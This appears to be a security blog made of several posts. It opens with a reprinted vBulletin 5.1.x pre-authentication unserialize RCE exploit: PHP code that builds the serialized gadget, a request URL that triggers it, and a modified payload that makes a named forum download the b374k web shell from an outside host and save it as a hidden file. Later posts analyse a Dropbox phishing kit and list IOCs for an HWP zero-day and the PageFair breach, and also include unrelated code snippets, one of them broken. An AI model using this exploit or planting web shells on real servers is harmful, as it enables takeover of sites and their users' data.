Vbulletin 5.X.X RCE Exploit

So, It has been all over news. Remote code execution in vBulletin forums due to unserialize function.

“vBulletin 5.1.x – PreAuth 0day Remote Code Execution Exploit”

# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE : 
# I did not discover this exploit, leaked from the IoT.
 
# Build the object
php << 'eof'
<?php
class vB_Database {
       public $functions = array();
 
       public function __construct() 
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}
 
class vB_dB_Result {
       protected $db;
       protected $recordset;
 
       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}
 
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
 
#Then hit decodeArguments with your payload :
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

The original post POC shared doesnt actually help you in executing commands on webserver. Following payload would help you in executing commands on webserver.

http:/osssd.com/forums/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A{s%3A5%3A%22%00*%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A{s%3A9%3A%22functions%22%3Ba%3A1%3A{s%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B}}s%3A12%3A%22%00*%00recordset%22%3Bs%3A85%3A%22system%28%22wget+https://b374k-shell.googlecode.com/files/b374k-2.8.php+-O+.jlsabse.php%22%29%22%3B}

About mentioned payload would “wget” and save file as “.jlsabse.php” in forums main directory.
Thanks.

DROPBOX Phishing page accepts credentials with Blacklist check

Recently while monitoring data collected via Opensource Threat Intelligence, I stumbled upon compromised website, hosting DropBox phishing page.

It is a known thing in market, whenever or wherever you see phishing page, first name that pop’s up in you mind? “NIGERIA”. (PS : I am not racially/ethnically discriminating any one. If anyone feels offended. I apologize for the same.)

After initial “access_log” analysis of web server, it was found user having IpAddress : 197.211.53.15, which resolves to Lagos, Nigeria (check here for detailed geolocation about user) used web backdoor to upload phishing page files.

Further continuing to interesting part of the phishing campaign analysis, in the files hosting phishing page. I stumbled upon following interesting factors used by actual programmer of page:

Detection of Proxy IpAddress :

$response = file_get_contents('http://www.shroomery.org/ythan/proxycheck.php?ip='.$v_ip, 0, $context);

NetCraft HTTP agent deny:

if ($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {

PhishTank Referrer Check:

if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com'){

The phishing script further stores complete information regarding ip address, logs from victims, blacklisted Ip address and total ip address visits as follows:

accepted_visitors.txt
db_file.txt
denied_vistors.txt
ips.txt

Stay tuned for more reports regarding malware, exploits and phishing/spam campaigns.

Hangul Word Processor (HWP) Zero-Day possible ties to North Korean threat actors

Detailed research by FireEye Check here!

CVE	CVE-2015-6585
FileHash-MD5	8e6724f2fec17e835327a48b07d38c09
FileHash-MD5	8e5e8ec909b11fdfa645e0c92246c922
FileHash-MD5	dad825999486ec40eea0014c2fc31556
hostname	http://www.lakaisandpine.co.kr

Malware Sample from Compromise : Virustotal HWP Zero-Day

File Names used by Malware:
2015년도 추계학술대회 안내문.hwp
2015년도 추계학술대회 안내문.hwp
svchost.exe
test.hwp

While writing this blog post 13/56 Malware Engines were detecting sample as Exploit.CVE-2015-6585.

IOCs for PageFair breach

More detailed information on PageFair breach: Complete Information

Information from Open-source research indicates following are the IOC’s (Indicator of Compromises):

FileHash-SHA256	fe086927ddd728af00d7a26a54ff87dbd1b96a2cb7ec46066f37be2093aca60f
IPv4	75.126.160.35
IPv4	168.1.88.118
IPv4	184.173.28.174
IPv4	184.173.28.175
IPv4	184.173.28.176
IPv4	192.155.192.104
IPv4	184.173.28.170
URL	http://184.173.28.175/adobe_flashplayer_7
URL	http://184.173.28.174/adobe_flashplayer_7
URL	http://75.126.160.35/adobe_flashplayer_7
URL	http://168.1.88.118/adobe_flashplayer_7
URL	http://192.155.192.104/adobe_flashplayer_7
URL	http://184.173.28.176/adobe_flashplayer_7
URL	http://184.173.28.170/adobe_flashplayer_7
hostname	alotpro2.dynu.com
IPv4	45.35.34.148

Ref: Alien Vault Pluse

Result from online malware scanner malwr.com used in breach of PageFair.

File Details

FILE NAME	adobe_flashplayer_7.exe
FILE SIZE	389120 bytes
FILE TYPE	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	d9b91aa8c66c4a701f5558bdca805eec
SHA1	6ad0393f506bc6e0a84f1325b3d75cca019c21bc
SHA256	fe086927ddd728af00d7a26a54ff87dbd1b96a2cb7ec46066f37be2093aca60f
SHA512	fe6555c677b91fb38ec7eaf5a68eb829f2ac683332f69f0ea8f6cbfaea8fa9c1ac4f9b55e6f484af3ef64919bc2b78e34ecec9aecd49c9a455b6df1658f14c96
CRC32	5F11D2D9
SSDEEP	6144:QtcYzIuNcRcpSWUnMu7ssc5HKi9QpIFiT+0PXBguTjmTwu1PznvIgE:OEuSxPYjKFpIFZ0fGCOwu1rvIgE

Ref: PageFair Breach Sample

Updates on PageFair Breach Malware:

@bartblaze 18m18 minutes ago

Malware served in #PageFair hack seems to be modified/cracked version of NanoCore RAT. Main purpose: coinminer. #malware <– #BreakingNews

Mysql query to count rows in tables from particular database

mysql> SELECT TABLE_NAME,SUM(TABLE_ROWS) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'Database' GROUP BY TABLE_NAME;

Free VPN with AutoConnect Windows – Python Script(code)

In order to use below python script:
1) BeautifulSoup python module is required on base system.
2) Create pptp based VPN connection with name 93.115.83.250.
3) On Linux this script will only print ip - username - password fetched from http://freevpn.me/accounts.

/*
Grab Free Vpn And AutoConnect Windows
Author :- c0deman
License :- Beerware
Thanks : http://freevpn.me/accounts for free VPN account
*/
from BeautifulSoup import BeautifulSoup
import requests
import os
import sys
import time

try:
    url = "http://freevpn.me/accounts"
    r = requests.get(url)
    if r.status_code == 200:
	  data = r.text
	  soup = BeautifulSoup(data)
	  plandiv = soup.find("div",{"class":"plan"})
	  getdata = plandiv.findAll('li')
	  gotip =  str(getdata[0].getText()).split(':')[1]
	  gotuser = str(getdata[1].getText()).split(':')[1]
	  gotpass = str(getdata[2].getText()).split(':')[1]
	  print gotip + " - " + gotuser + " - " + gotpass
	  if "win" in sys.platform:
		print "Disconnecting All VPN's"
		os.system("rasdial /disconnect")
		time.sleep(2)
		connectcmd = "rasdial 93.115.83.250 "+gotuser+" "+gotpass+" /phone:"+gotip
		#print connectcmd
		os.system(connectcmd)

	  
except Exception, e:
  print e

Command python setup.py egg_info failed with error code 1 in /tmp/pip_build_root/MySQL-python

Recently encountered with error while installing mysql-python on linux

String from Error:
“Command python setup.py egg_info failed with error code 1 in /tmp/pip_build_root/MySQL-python”

Soultion:

sudo apt-get install libmysqlclient-dev

After installing libmysqlclient-dev

sudo pip install mysql-python

Thanks!

Trigraph Sequence C programming

In general you can use a question mark directly in a string. The \? escape sequence only exists because there are nine
special sequences of characters called trigraph sequences that are three-characters sequences for representing each
of the characters #, [,], \, ^, ~, \, {, and }:

??= converts to #
??( converts to [
??) converts to ]
??/ converts to \
?? converts to }
??’ converts to ^
??! converts to |
??- converts to ~

Example:

printf("What??!\n");

The output produced by this statement will be:

What|

Important Networking WINAPI list

DLL : ws2_32.dll
API LIST:

WSAStartup: Initiates use of Winsock DLL by a process, without initialization of WSAstartup application or DLL cannot further access WINSOCKET functions.
socket: The socket function creates a socket that is bound to a specific transport service provider.
bind: The bind function may be used to bind to a raw or unconnected socket.
listen: The listen function places a socket in a state in which it is listening for an incoming connection.
accept: The accept function permits an incoming connection attempt on a socket.
connect: The connect function establishes a connection to a specified socket.
recv: The recv function receives data from a connected socket or a bound connectionless socket.
send: The send function sends data on a connected socket.
gethostbyname : The gethostbyname function retrieves host information corresponding to a host name from a host database.

DLL : Wininet.dll
API LIST:

InternetOpen: InternetOpen is the first WinINet function called by an application. It tells the Internet DLL to initialize internal data structures and prepare for future calls from the application.
InternetOpenUrl: Opens a resource specified by a complete FTP or HTTP URL.
InternetReadFile: Reads data from a handle opened by the InternetOpenUrl, FtpOpenFile, or HttpOpenRequest function.

Reference:-
MSDN

Find Nameservers of domain name – Python

In order to extract nameservers, mx and other DNS records of domain name via Python.
‘dnspython’ package is required.
If ‘dnspython’ package is not installed on system, it can be installed via ‘pip’

Downloading ‘dnspython’ package:

pip install dnspython

Code:

import dns.resolver

domain = 'google.com'
nameservers = dns.resolver.query(domain,'NS')
for data in answers:
	print data

Result :

ns1.google.com.
ns2.google.com.
ns4.google.com.
ns3.google.com.